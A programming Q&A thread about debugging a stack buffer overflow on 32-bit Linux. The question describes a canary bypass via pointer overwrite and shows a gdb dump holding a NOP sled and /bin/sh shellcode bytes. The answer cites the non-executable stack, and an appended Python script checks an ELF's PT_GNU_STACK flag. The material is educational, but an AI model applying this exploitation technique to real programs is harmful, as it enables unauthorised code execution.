
Buffer overflow: EIP and jump correctly set but segfault

I am performing a buffer overflow, by avoiding the canary through a memcpy to a pointer, as explained here. In short, you overwrite the address a pointer points to, with the address of the RET in the stack. So memcpy-ing to that pointer effectively overwrites RET.

Using gdb, I inject my NOP-sled + shellcode + address_overwrite just fine. I can see that RET, at 0xbffff52c, contains a desired address, 0xbffff4c0, that will land in the NOP sled.

    (gdb) x /32xw $esp
    0xbffff470: 0xbffff52c 0x0804a008 0x00000004 0x00000000
    0xbffff480: 0x000003f3 0x08048327 0x90909087 0x90909090
    0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090
    0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090
    0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090
    0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090
    0xbffff4d0: 0x90909090 0x90909090 0x90909090 0xeb909090
    0xbffff4e0: 0x76895e1f 0x88c03108 0x46890746 0x890bb00c
    (gdb)
    0xbffff4f0: 0x084e8df3 0xcd0c568d 0x89db3180 0x80cd40d8
    0xbffff500: 0xffffdce8 0x69622fff 0x68732f6e 0xbffff52c
    0xbffff510: 0xbffff5a8 0xb7ff5990 0x0000008f 0xbffff5a8
    0xbffff520: 0xb7fd1ff4 0x0804a008 0xbffff5a8 0xbffff4c0
    0xbffff530: 0x0804a008 0x0804a008 0x0000008f 0x00000001
    0xbffff540: 0x00000801 0x00000000 0xbfff0000 0x002001ac
    0xbffff550: 0x000081a4 0x00000001 0x000004ad 0x000004ad
    0xbffff560: 0x00000000 0x00000000 0xb7fd0000 0x0000008f

However, running this I get the error below, even though disassembly shows I landed correctly.

Program received signal SIGSEGV, Segmentation fault.
0xbffff4c0 in ?? ()
(gdb) disas 0xbffff4c0, + 10
Dump of assembler code from 0xbffff4c0 to 0xbffff4ca:
=> 0xbffff4c0:  nop
   0xbffff4c1:  nop
   0xbffff4c2:  nop
   0xbffff4c3:  nop
   0xbffff4c4:  nop
   0xbffff4c5:  nop
   0xbffff4c6:  nop
   0xbffff4c7:  nop
   0xbffff4c8:  nop
   0xbffff4c9:  nop

Further below is the shellcode.

       0xbffff4df:  jmp    0xbffff500
       0xbffff4e1:  pop    %esi
       0xbffff4e2:  mov    %esi,0x8(%esi)
       0xbffff4e5:  xor    %eax,%eax
       0xbffff4e7:  mov    %al,0x7(%esi)
       0xbffff4ea:  mov    %eax,0xc(%esi)
       0xbffff4ed:  mov    $0xb,%al
       0xbffff4ef:  mov    %esi,%ebx

... etc.

I used the shellcode from Smashing the Stack, Appendix B, for the Linux system. Can you help me understand what's wrong?

You didn't say what OS you are on, or how you built your target program.

Assuming Linux and no -Wl,-z,execstack, modern Linux distributions default to -Wl,-z,noexecstack, which (surprise!) makes the stack non-executable.

You can read about some of the protection mechanisms here.
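The linker records the -z execstack / -z noexecstack choice the answer refers to in a PT_GNU_STACK program header, so the quickest way to confirm why a jump into stack memory faults is to inspect that header (readelf -lW a.out | grep GNU_STACK does the same). The following is an added example, not code from the question or the answer: a small stand-alone parser for that header that reports whether a binary asks for an executable stack, with a constructed (non-runnable) ELF32 image used only as sample input; the sample builder, its fake PT_LOAD segment and the check_file helper are all assumptions made for this illustration.

```python
"""Report the executable-stack flag (PT_GNU_STACK) of an ELF binary.

Added example, not part of the original question or answer. It reads the
ELF program headers directly, without pyelftools, and reports what the
linker recorded for the stack: -z noexecstack -> RW, -z execstack -> RWX.
A missing PT_GNU_STACK header leaves the decision to the kernel, which on
32-bit x86 Linux historically meant an executable stack.
"""
import struct
import sys

PT_GNU_STACK = 0x6474E551  # p_type value reserved for the stack-permission header
PF_X = 0x1
PF_W = 0x2
PF_R = 0x4


def gnu_stack_flags(data: bytes):
    """Return p_flags of the PT_GNU_STACK header, or None if the header is absent."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = data[4]  # 1 = ELF32, 2 = ELF64
    ei_data = data[5]   # 1 = little-endian, 2 = big-endian
    end = "<" if ei_data == 1 else ">"
    if ei_class == 1:
        # ELF32 header: e_phoff at offset 28, e_phentsize/e_phnum at 42/44
        (e_phoff,) = struct.unpack_from(end + "I", data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
        # Elf32_Phdr: p_type p_offset p_vaddr p_paddr p_filesz p_memsz p_flags p_align
        fmt, type_idx, flags_idx = end + "IIIIIIII", 0, 6
    elif ei_class == 2:
        # ELF64 header: e_phoff at offset 32, e_phentsize/e_phnum at 54/56
        (e_phoff,) = struct.unpack_from(end + "Q", data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
        # Elf64_Phdr: p_type p_flags p_offset p_vaddr p_paddr p_filesz p_memsz p_align
        fmt, type_idx, flags_idx = end + "IIQQQQQQ", 0, 1
    else:
        raise ValueError("unknown ELF class %d" % ei_class)
    for i in range(e_phnum):
        ph = struct.unpack_from(fmt, data, e_phoff + i * e_phentsize)
        if ph[type_idx] == PT_GNU_STACK:
            return ph[flags_idx]
    return None


def describe_stack(data: bytes) -> str:
    """Human-readable verdict on the stack permissions requested by the binary."""
    flags = gnu_stack_flags(data)
    if flags is None:
        return "no PT_GNU_STACK header (kernel default; executable on old x86 setups)"
    perms = "".join(ch if flags & bit else "-"
                    for ch, bit in (("r", PF_R), ("w", PF_W), ("x", PF_X)))
    kind = "executable" if flags & PF_X else "non-executable"
    return "%s stack (%s)" % (kind, perms)


def check_file(path: str) -> str:
    """Hypothetical helper: run the check on a binary on disk."""
    with open(path, "rb") as fh:
        return describe_stack(fh.read())


def make_elf32_sample(stack_flags=None) -> bytes:
    """Constructed minimal ELF32 little-endian image for offline testing.

    It is not a runnable program; it only carries the headers the checker
    inspects: one fake PT_LOAD segment plus an optional PT_GNU_STACK header.
    """
    phdrs = [(1, 0, 0x08048000, 0x08048000, 0x1000, 0x1000, PF_R | PF_X, 0x1000)]
    if stack_flags is not None:
        phdrs.append((PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0x10))
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)  # ELF32, LE, version 1, SysV ABI
    ehdr = e_ident + struct.pack("<HHIIIIIHHHHHH",
                                 2, 3, 1, 0x08048000,  # ET_EXEC, EM_386, EV_CURRENT, e_entry
                                 52, 0, 0,             # e_phoff right after the header, no sections
                                 52, 32, len(phdrs),   # e_ehsize, e_phentsize, e_phnum
                                 40, 0, 0)             # e_shentsize, e_shnum, e_shstrndx
    return ehdr + b"".join(struct.pack("<IIIIIIII", *p) for p in phdrs)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check_file(sys.argv[1]))
    else:
        for label, flags in (("noexecstack", PF_R | PF_W), ("execstack", PF_R | PF_W | PF_X), ("absent", None)):
            print("%-12s %s" % (label, describe_stack(make_elf32_sample(flags))))
```

Run it against the target (python3 gnustack.py ./target) after building once with -z execstack and once without to see the flag flip between rwx and rw-; a binary reporting rw- is one where a return into the NOP sled on the stack will fault exactly as in the question, regardless of whether the addresses are right.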
